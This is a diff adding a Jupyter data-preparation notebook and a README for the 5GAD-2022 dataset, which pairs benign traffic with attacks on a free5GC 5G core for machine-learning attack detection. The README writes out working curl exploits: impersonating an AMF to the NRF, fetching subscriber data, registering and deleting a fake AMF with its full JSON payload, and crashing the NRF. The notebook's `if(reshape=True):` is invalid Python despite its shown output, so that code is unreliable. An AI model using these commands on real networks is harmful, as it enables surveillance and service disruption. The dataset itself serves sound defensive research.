     781 + "output_type": "stream",
     782 + "text": [
     783 + "Packets in malicious: 24174\n",
     784 + "Packets in mixed: 48349\n",
     785 + "Mixed set is of the expected size: False\n"
     786 + ]
     787 + }
     788 + ],
     789 + "source": [
     790 + "mixed = malicious.sample(frac=1,random_state=100) #take all the malicious\n",
     791 + "mixed = pd.concat([mixed, normal.sample(frac=1,random_state=100)[0:len(malicious)//2]]) #append the first {half the length of malicious} packets from normal-1ue\n",
     792 + "mixed = pd.concat([mixed, normal2UE.sample(frac=1,random_state=100)[0:len(malicious)//2]]) #append the first {half the length of malicious} packets from normal-2ue\n",
     793 + "mixed = mixed.sample(frac=1,random_state=1) #shuffle the data before processing\n",
     794 + "## Separate the labels (important for using the mixed data to evaluate an autoencoder)\n",
     795 + "mixed_labels = mixed.pop('label')\n",
     796 + "np.save(f'{processedPath}mixed_labels.npy',mixed_labels)\n",
     797 + "del mixed_labels\n",
     798 + "print('Packets in malicious: ',len(malicious))\n",
     799 + "print('Packets in mixed: ',len(mixed))\n",
     800 + "print('Mixed set is of the expected size: ',len(malicious)*2==len(mixed))"
     801 + ]
     802 + },
     803 + {
     804 + "cell_type": "markdown",
     805 + "metadata": {},
     806 + "source": [
     807 + "## Normalize the packet lengths and reshape each packet's string of bytes to an array of bytes\n",
     808 + "- The length of the payloads can vary widely, from a few bytes to several thousand bytes. I checked a few dozen attack packets, and those usually weren't much longer (+/- 20%) than 1000 bytes. We have to use a square number for the length because our FPGAs don't like performing convolutions unless the inputs are square, i.e. 10x10, 25x25, 32x32, etc. If this is not desired, set the `reshape` argument to `False`\n",
     809 + " - to normalize the payload length, append zeros to the ends of packets shorter than the desired size and truncate longer packets to the desired size\n",
     810 + " - to convert from byte string to byte array, we use the numpy function `frombuffer`"
     811 + ]
     812 + },
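        + {
        + "cell_type": "code",
        + "execution_count": null,
        + "metadata": {},
        + "outputs": [],
        + "source": [
        + "# Editor's sketch of the normalization on one short hex string (target length 16 here):\n",
        + "demo = '4500b8'.ljust(16, '0')[0:16].encode('utf8')  # pad with '0', then truncate\n",
        + "np.frombuffer(demo, dtype=np.uint8, count=16)  # ASCII codes of the hex characters"
        + ]
        + },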
     813 + {
     814 + "cell_type": "markdown",
     815 + "metadata": {},
     816 + "source": [
     817 + "#### Declare the desired, normalized size for the packets:"
     818 + ]
     819 + },
     820 + {
     821 + "cell_type": "code",
     822 + "execution_count": 12,
     823 + "metadata": {},
     824 + "outputs": [],
     825 + "source": [
     826 + "max_packet_length = 1024"
     827 + ]
     828 + },
     829 + {
     830 + "cell_type": "code",
     831 + "execution_count": 13,
     832 + "metadata": {},
     833 + "outputs": [],
     834 + "source": [
     835 + "def ReshapePackets(dataFrame, saveToFilename, max_packet_length, reshape=True):\n",
     836 + " '''Converts from byte strings in a DataFrame to a numpy array of bytes'''\n",
     837 + " array = np.array(dataFrame['raw'])\n",
     838 + " array = np.ascontiguousarray(array)\n",
     839 + " payloads = []\n",
     840 + " array.shape\n",
     841 + " for i in range(array.shape[0]):\n",
     842 + "# print(array[i])\n",
     843 + " # Standardize the length of the strings:\n",
     844 + " payloadStr = array[i].split('\\'')[1]\n",
     845 + " payloadStr = payloadStr.ljust(max_packet_length+2, u'0')\n",
     846 + " payloadStr = payloadStr[0:max_packet_length]\n",
     847 + " array[i] = payloadStr.encode('utf8')\n",
     848 + " # Convert to array:\n",
     849 + " array[i] = np.frombuffer(array[i],dtype=np.uint8,count=max_packet_length)\n",
     850 + " if(reshape=True):\n",
     851 + " payloads.append(np.reshape(array[i],(array[i].shape[0],1,1)))\n",
     852 + " else:\n",
     853 + " payloads.append(array[i])\n",
     854 + " payloads = np.array(payloads)\n",
     855 + " print('New data shape: ',payloads.shape)\n",
     856 + " np.save(saveToFilename,payloads)"
     857 + ]
     858 + },
     859 + {
     860 + "cell_type": "markdown",
     861 + "metadata": {},
     862 + "source": [
     863 + "### Normalize and reshape the mixed data\n",
     864 + "Also delete it to free memory"
     865 + ]
     866 + },
     867 + {
     868 + "cell_type": "code",
     869 + "execution_count": 14,
     870 + "metadata": {},
     871 + "outputs": [
     872 + {
     873 + "name": "stdout",
     874 + "output_type": "stream",
     875 + "text": [
     876 + "New data shape: (48349, 1024, 1, 1)\n"
     877 + ]
     878 + }
     879 + ],
     880 + "source": [
     881 + "ReshapePackets(mixed,f'{processedPath}mixed.npy',max_packet_length)\n",
     882 + "del mixed"
     883 + ]
     884 + },
     885 + {
     886 + "cell_type": "markdown",
     887 + "metadata": {},
     888 + "source": [
     889 + "### Create a 50/50 split of the two types of normal data:\n",
     890 + "As before, delete the variables after we're done with them"
     891 + ]
     892 + },
     893 + {
     894 + "cell_type": "code",
     895 + "execution_count": 24,
     896 + "metadata": {},
     897 + "outputs": [
     898 + {
     899 + "name": "stdout",
     900 + "output_type": "stream",
     901 + "text": [
     902 + "New data shape: (9339618, 1024, 1, 1)\n",
     903 + "New data shape: (24851445, 1024, 1, 1)\n",
     904 + "New data shape: (18679236, 1024, 1, 1)\n"
     905 + ]
     906 + }
     907 + ],
     908 + "source": [
     909 + "totalNormal = pd.concat([normal.sample(frac=1,random_state=2022),\n",
     910 + " normal2UE.sample(frac=1,random_state=100)[0:len(normal)]\n",
     911 + " ])\n",
     912 + "totalNormal = totalNormal.sample(frac=1,random_state=2022)\n",
     913 + "ReshapePackets(normal,f'{processedPath}normal.npy',max_packet_length)\n",
     914 + "del normal\n",
     915 + "ReshapePackets(normal2UE,f'{processedPath}normal2UE.npy',max_packet_length)\n",
     916 + "del normal2UE\n",
     917 + "ReshapePackets(totalNormal,f'{processedPath}total_normal.npy',max_packet_length)\n",
     918 + "del totalNormal"
     919 + ]
     920 + },
     921 + {
     922 + "cell_type": "code",
     923 + "execution_count": 25,
     924 + "metadata": {},
     925 + "outputs": [
     926 + {
     927 + "name": "stdout",
     928 + "output_type": "stream",
     929 + "text": [
     930 + "[[[52]]\n",
     931 + "\n",
     932 + " [[97]]\n",
     933 + "\n",
     934 + " [[97]]\n",
     935 + "\n",
     936 + " ...\n",
     937 + "\n",
     938 + " [[48]]\n",
     939 + "\n",
     940 + " [[48]]\n",
     941 + "\n",
     942 + " [[48]]]\n",
     943 + "['normal' 'normal' 'normal' 'attack' 'normal']\n"
     944 + ]
     945 + }
     946 + ],
     947 + "source": [
     948 + "mixed = np.load(f'{processedPath}mixed.npy',allow_pickle=True)\n",
     949 + "labels = np.load(f'{processedPath}mixed_labels.npy',allow_pickle=True)\n",
     950 + "print(mixed[0:5][1])\n",
     951 + "print(labels[0:5])"
     952 + ]
     953 + },
     954 + {
     955 + "cell_type": "code",
     956 + "execution_count": null,
     957 + "metadata": {},
     958 + "outputs": [],
     959 + "source": []
     960 + }
     961 + ],
     962 + "metadata": {
     963 + "kernelspec": {
     964 + "display_name": "Python 3 (ipykernel)",
     965 + "language": "python",
     966 + "name": "python3"
     967 + },
     968 + "language_info": {
     969 + "codemirror_mode": {
     970 + "name": "ipython",
     971 + "version": 3
     972 + },
     973 + "file_extension": ".py",
     974 + "mimetype": "text/x-python",
     975 + "name": "python",
     976 + "nbconvert_exporter": "python",
     977 + "pygments_lexer": "ipython3",
     978 + "version": "3.9.13"
     979 + }
     980 + },
     981 + "nbformat": 4,
     982 + "nbformat_minor": 4
     983 +}
     984 + 
    README.md
     1 +# 5GAD-2022 5G attack detection dataset
     2 + 
     3 +> This dataset was created by Cooper Coldwell, Denver Conger, Edward Goodell, Brendan Jacobson, Bryton Petersen, Damon Spencer, Matthew Anderson, and Matthew Sgambati and introduced in ***Machine Learning 5G Attack Detection in Programmable Logic***.
     4 + 
     5 +This dataset contains two types of intercepted network packets: "normal" network traffic packets (i.e. a variety of non-malicious traffic types) and attacks against a 5G Core implemented with free5GC. The captures were collected using tshark or Wireshark on 4 different network interfaces within the 5G core. Those interfaces, and where they sit within the system, are outlined in the 5GNetworkDiagram figure. Files that start with "allcap" contain packets recorded on all four interfaces simultaneously; the other \*.pcapng files contain the same data broken out for a single interface.
     6 + 
     7 +![5GNetworkDiagram.png](attachment:5GNetworkDiagram.png)
     8 + 
     9 +# Citation and Contact
     10 +If you use our dataset, please cite it:
     11 +```
     12 +@dataset{5gad,
     13 + title={5GAD-2022},
     14 + author={Coldwell, Conger, Goodell, Jacobson, Petersen, Spencer, Anderson, Sgambati},
     15 + doi={},
     16 + journal={},
     17 + year={2022}
     18 +}
     19 +```
     20 +If you find our paper useful, please cite it:
     21 +```
     22 +@article{5g_ml_fpga,
     23 + title={Machine Learning 5G Attack Detection in Programmable Logic},
     24 + author={Coldwell, Conger, Goodell, Jacobson, Petersen, Spencer, Anderson, Sgambati},
     25 + doi={},
     26 + journal={},
     27 + year={2022}
     28 +}
     29 +```
     30 + 
     31 + 
     32 +**NOTE: To reduce the download size, the normal sets do not contain explicit per-interface breakdowns. The individual interfaces can be separated from the allcap files in Wireshark as follows** (a scripted alternative is sketched after this list):
     33 +1. Add a new column to Wireshark via Edit->Preferences->Appearance->Columns, then click '+' to add a new column.
     34 +2. Set the column 'type' to 'Custom' and the field to 'frame.interface_name'.
     35 +3. To select only a particular interface, return to the main Capture page.
     36 +4. Apply the filter 'frame.interface_name==' followed by the desired interface.
     37 +5. Export the separated packets via File->Export Specified Packets.
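       + 
       +For batch workflows, the same separation can be scripted. The following is a minimal sketch, assuming the `tshark` CLI (shipped with Wireshark) is installed; the helper name and the example interface are illustrative:
       +```
       +# Hypothetical helper: write only the packets captured on one interface to a new file.
       +import subprocess
       +
       +def split_interface(allcap_path, interface, out_path):
       +    subprocess.run(
       +        ["tshark", "-r", allcap_path,                     # read the combined capture
       +         "-Y", f'frame.interface_name == "{interface}"',  # same field as the Wireshark column
       +         "-w", out_path],                                 # write only the matching packets
       +        check=True)
       +
       +# e.g. split_interface("Normal-1UE/allcap_00001_20220606131007.pcapng", "lo", "lo_only.pcapng")
       +```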
     38 + 
     39 +***
     40 + 
     41 +# Normal Data and Descriptions
     42 +### Normal-1UE
     43 +This dataset consists of normal internet traffic recorded on the same interfaces as the attack dataset. Specifically, it contains network traffic simulated on a single UE with various automated tasks including streaming YouTube videos, accessing 500 popular websites, downloading files via FTP, mounting a SAMBA share and downloading files from it, and having a conference call via Microsoft Teams.
     44 + 
     45 +### Normal-2UE
     46 +The same traffic types as in *Normal-1UE* were used for *Normal-2UE*, except this time, the traffic generation was divided between 2 UEs.
     47 + 
     48 +All of the packets are contained in the "total_allcap\*.pcapng" file; to ease processing, we split it into a sequential series of smaller files. The order of these files is given by the number preceding the file extension. For example, "allcap_20220613162057_00010.pcapng" is the 10th file in the sequence.
     49 +***
     50 + 
     51 +# Attack Data and Descriptions
     52 +There are 10 attacks that we ran on our 5G test bench, most of which rely on REST API calls to different parts of the core.
     53 + 
     54 +The *Attacks* directory contains the attacks, each in its own subdirectory. Within each attack directory is a *\*.pcapng* file beginning with "Attacks_" that contains only the attack packets present in the "allcap" file. Files not beginning with "Attacks_" may contain some benign, incidental traffic.
     55 + 
     56 +## Surveillance Attacks
     57 + 
     58 +### AMFLookingForUDM
     59 +This attack is performed by requesting information about the unified data management (UDM) network function while impersonating an access and mobility management function (AMF). Internally this attack appears to be a benign system request and exploits the fact that the network repository function (NRF) does not check if the source of the request is actually an AMF. This attack is performed with the following Linux command:
     60 +```
     61 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=AMF\&target-nf-type=UDM"
     62 +```
     63 +where 127.0.0.10 is the IP address of the NRF.
     64 + 
     65 +### GetAllNFs
     66 +This attack is performed identically to *AMFLookingForUDM* except the `target-nf-type` is not specified. This results in the NRF returning all network functions (NF) to the requester.
     67 +
     68 +### GetUserData
     69 +This attack requests information from the UDM regarding a user with `subscriberID=0000000003`. This attack was performed with:
     70 +```
     71 +curl "http://127.0.0.3:8000/nudm-sdm/v1/imsi-20893\$\{subscriberID\}/am-data?plmn-id=\%7B\%22mcc\%22\%3A\%22208\%22\%2C\%22mnc\%22\%3A\%2293\%22\%7D"
     72 +```
       +The percent-escaped query string expands to `plmn-id={"mcc":"208","mnc":"93"}`.
     73 + 
     74 +### randomDataDump
     75 +This attack exploits a lack of input validation in free5GC and sets the `requester-nf-type` to a random string when making an `nf-instances` request to the NRF. The NRF will still respond with all of the NFs. This attack is executed with the following Linux command:
     76 +```
     77 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\$randomString\&target-nf-type="
     78 +```
     79 + 
     80 +### automatedRedirectWithTimer
     81 +This attack is from Positive Technologies' report *5G Standalone core security research* section 4.3. In essence, it listens to network traffic while the UE is connecting. The attack code listens for a packet forwarding control protocol (PFCP) session establishment request, then checks if the UE address is in a list of victim addresses. If the UE is a victim then the attack records session information that it uses to redirect traffic from the UE. This is achieved by sending a PFCP session modification request to the user plane function (UPF) with the discovered session ID and forwarding action rule ID (FARID). The attack will send two such modification requests, wait 5 seconds, send two more modification requests to return the UE to its normal path, wait 5 more seconds, and then repeat.
     82 +
     83 +## Network Reconfiguration Attacks
     84 +### FakeAMFInsert
     85 +This attack registers a fake AMF with the NRF by using `curl` to `PUT` a JSON object to the NRF. In the environment where this attack was run, there is no authority check to prevent an attacker from registering a fake AMF; the *FakeAMFDelete* attack is subsequently run to remove it. The instance-ID is required to be a version 4 universally unique identifier (UUID), but free5GC does not validate the instance-ID or other details about the AMF before adding it to the core, including whether the instance-ID is properly formatted hexadecimal. A few 1's in the attack's UUID string were replaced with l's while writing the attack code, so the instance-ID was an invalid UUID, yet free5GC accepted it regardless. The full curl command with its JSON payload is below.
     86 + 
     87 +```
     88 +curl -X PUT -H "Content-Type: application/json" -d
     89 +"{
     90 + "nfInstanceId":"b01dface-bead-cafe-bade-cabledfabled",
     91 + "nfType":"AMF",
     92 + "nfStatus":"REGISTERED",
     93 + "plmnList":[
     94 + {
     95 + "mcc":"208",
     96 + "mnc":"93"
     97 + },
     98 + {
     99 + "mcc":"001",
     100 + "mnc":"01"
     101 + }
     102 + ],
     103 + "sNssais":[
     104 + {
     105 + "sst":1,
     106 + "sd":"010203"
     107 + },
     108 + {
     109 + "sst":1,
     110 + "sd":"112233"
     111 + }
     112 + ],
     113 + "ipv4Addresses":[
     114 + "127.0.0.18"
     115 + ],
     116 + "amfInfo":{
     117 + "amfSetId":"3f8",
     118 + "amfRegionId":"ca",
     119 + "guamiList":[
     120 + {
     121 + "plmnId":{
     122 + "mcc":"208",
     123 + "mnc":"93"
     124 + },
     125 + "amfId":"cafe00"
     126 + },
     127 + {
     128 + "plmnId":{
     129 + "mcc":"208",
     130 + "mnc":"93"
     131 + },
     132 + "amfId":"cafe01"
     133 + }
     134 + ],
     135 + "taiList":[
     136 + {
     137 + "plmnId":{
     138 + "mcc":"208",
     139 + "mnc":"93"
     140 + },
     141 + "tac":"000001"
     142 + },
     143 + {
     144 + "plmnId":{
     145 + "mcc":"001",
     146 + "mnc":"01"
     147 + },
     148 + "tac":"000064"
     149 + }
     150 + ]
     151 + },
     152 + "nfServices":[
     153 + {
     154 + "serviceInstanceId":"0",
     155 + "serviceName":"namf-comm",
     156 + "versions":[
     157 + {
     158 + "apiVersionInUri":"v1",
     159 + "apiFullVersion":"1.0.0"
     160 + }
     161 + ],
     162 + "scheme":"http",
     163 + "nfServiceStatus":"REGISTERED",
     164 + "ipEndPoints":[
     165 + {
     166 + "ipv4Address":"127.0.0.18",
     167 + "transport":"TCP",
     168 + "port":8000
     169 + }
     170 + ],
     171 + "apiPrefix":"http://127.0.0.18:8000"
     172 + },
     173 + {
     174 + "serviceInstanceId":"1",
     175 + "serviceName":"namf-evts",
     176 + "versions":[
     177 + {
     178 + "apiVersionInUri":"v1",
     179 + "apiFullVersion":"1.0.0"
     180 + }
     181 + ],
     182 + "scheme":"http",
     183 + "nfServiceStatus":"REGISTERED",
     184 + "ipEndPoints":[
     185 + {
     186 + "ipv4Address":"127.0.0.18",
     187 + "transport":"TCP",
     188 + "port":8000
     189 + }
     190 + ],
     191 + "apiPrefix":"http://127.0.0.18:8000"
     192 + },
     193 + {
     194 + "serviceInstanceId":"2",
     195 + "serviceName":"namf-mt",
     196 + "versions":[
     197 + {
     198 + "apiVersionInUri":"v1",
     199 + "apiFullVersion":"1.0.0"
     200 + }
     201 + ],
     202 + "scheme":"http",
     203 + "nfServiceStatus":"REGISTERED",
     204 + "ipEndPoints":[
     205 + {
     206 + "ipv4Address":"127.0.0.18",
     207 + "transport":"TCP",
     208 + "port":8000
     209 + }
     210 + ],
     211 + "apiPrefix":"http://127.0.0.18:8000"
     212 + },
     213 + {
     214 + "serviceInstanceId":"3",
     215 + "serviceName":"namf-loc",
     216 + "versions":[
     217 + {
     218 + "apiVersionInUri":"v1",
     219 + "apiFullVersion":"1.0.0"
     220 + }
     221 + ],
     222 + "scheme":"http",
     223 + "nfServiceStatus":"REGISTERED",
     224 + "ipEndPoints":[
     225 + {
     226 + "ipv4Address":"127.0.0.18",
     227 + "transport":"TCP",
     228 + "port":8000
     229 + }
     230 + ],
     231 + "apiPrefix":"http://127.0.0.18:8000"
     232 + },
     233 + {
     234 + "serviceInstanceId":"4",
     235 + "serviceName":"namf-oam",
     236 + "versions":[
     237 + {
     238 + "apiVersionInUri":"v1",
     239 + "apiFullVersion":"1.0.0"
     240 + }
     241 + ],
     242 + "scheme":"http",
     243 + "nfServiceStatus":"REGISTERED",
     244 + "ipEndPoints":[
     245 + {
     246 + "ipv4Address":"127.0.0.18",
     247 + "transport":"TCP",
     248 + "port":8000
     249 + }
     250 + ],
     251 + "apiPrefix":"http://127.0.0.18:8000"
     252 + }
     253 + ],
     254 + "defaultNotificationSubscriptions":[
     255 + {
     256 + "notificationType":"N1_MESSAGES",
     257 + "callbackUri":"http://127.0.0.18:8000/namf-callback/v1/n1-message-notify",
     258 + "n1MessageClass":"5GMM"
     259 + }
     260 + ]
     261 +}"
     262 + 
     263 +http://127.0.0.10:8000/nnrf-nfm/v1/nf-instances/b01dface-bead-cafe-bade-cabledfabled
     264 +```
     265 +
     266 +### randomAMFInsert
     267 +This attack is the same as "FakeAMFInsert" except the instance ID is a randomly generated UUID.
     268 + 
     269 +## DOS Attacks
     270 +### CrashNRF
     271 +This attack relies on an exploit in free5GC wherein a malformed request to the network repository function (NRF) will cause it to crash. This attack is run using
     272 +```
     273 +curl "http://127.0.0.10:8000/nnrf-disc/v1/nf-instances?requester-nf-type=\&target-nf-type="
     274 +```
     275 +where 127.0.0.10 is the IP address of the NRF. As of free5GC v3.1.1, this exploit appears to have been patched, as this HTTP `GET` request will no longer result in the failure of the core.
     276 +
     277 +### FakeAMFDelete
     278 +This attack is operated in conjunction with *FakeAMFInsert* with the line
     279 +```
     280 +curl -s -o /dev/null -w "\n\nHTTP Status Code: %{http_code}\n\n" -X DELETE http://127.0.0.10:8000/nnrf-nfm/v1/nf-instances/$fakeAMF
     281 +```
     282 +where `fakeAMF` is the instance ID of the false AMF inserted into the system. This attack, coupled with *GetAllNFs* to find other AMFs, could be exploited to remove legitimate AMFs from the network, disrupting network functionality.
     283 + 
     284 +### automatedDropWithTimer
     285 +This attack is similar to *automatedRedirectWithTimer*, but alternates between redirecting user traffic and dropping user traffic, effectively disconnecting the user from the data network (DN).
     286 + 
     313 +***
     314 +# Data Preparation
     315 +Included with the dataset are two versions of the file used to process the data for training autoencoders for anomaly detection, though the files can be adapted for other purposes as well. The `Data_prep.ipynb` notebook walks through the data preparation in detail, while the `Data_prep.py` script was derived from the notebook to be a more cut-down, lightweight version.
     316 + 
     317 +Without modification, the data preparation files require **at least** 96 GB of memory and several hours to process the data. This can likely be overcome by changing the `sniff(...)` calls to process each packet as it is read, instead of storing every packet in memory.
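       + 
       +A minimal sketch of that change, using Scapy's `prn` callback with `store=0` (illustrative, not the code used to build the dataset):
       +```
       +import binascii
       +from scapy.all import Raw, sniff
       +
       +payloads = []
       +
       +def collect(packet):
       +    # Keep only the hexlified Raw payload; the packet object itself is discarded.
       +    if Raw in packet:
       +        payloads.append(binascii.hexlify(packet[Raw].original))
       +
       +# store=0 tells sniff() not to retain packets in memory; prn runs once per packet.
       +sniff(offline="Normal-1UE/allcap_00001_20220606131007.pcapng", prn=collect, store=0)
       +```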
     318 + 
     319 +Special thanks to Christopher Becker and Jesse Cooper.
     320 + 
     321 +This is the end of the description.
     322 +
     323 +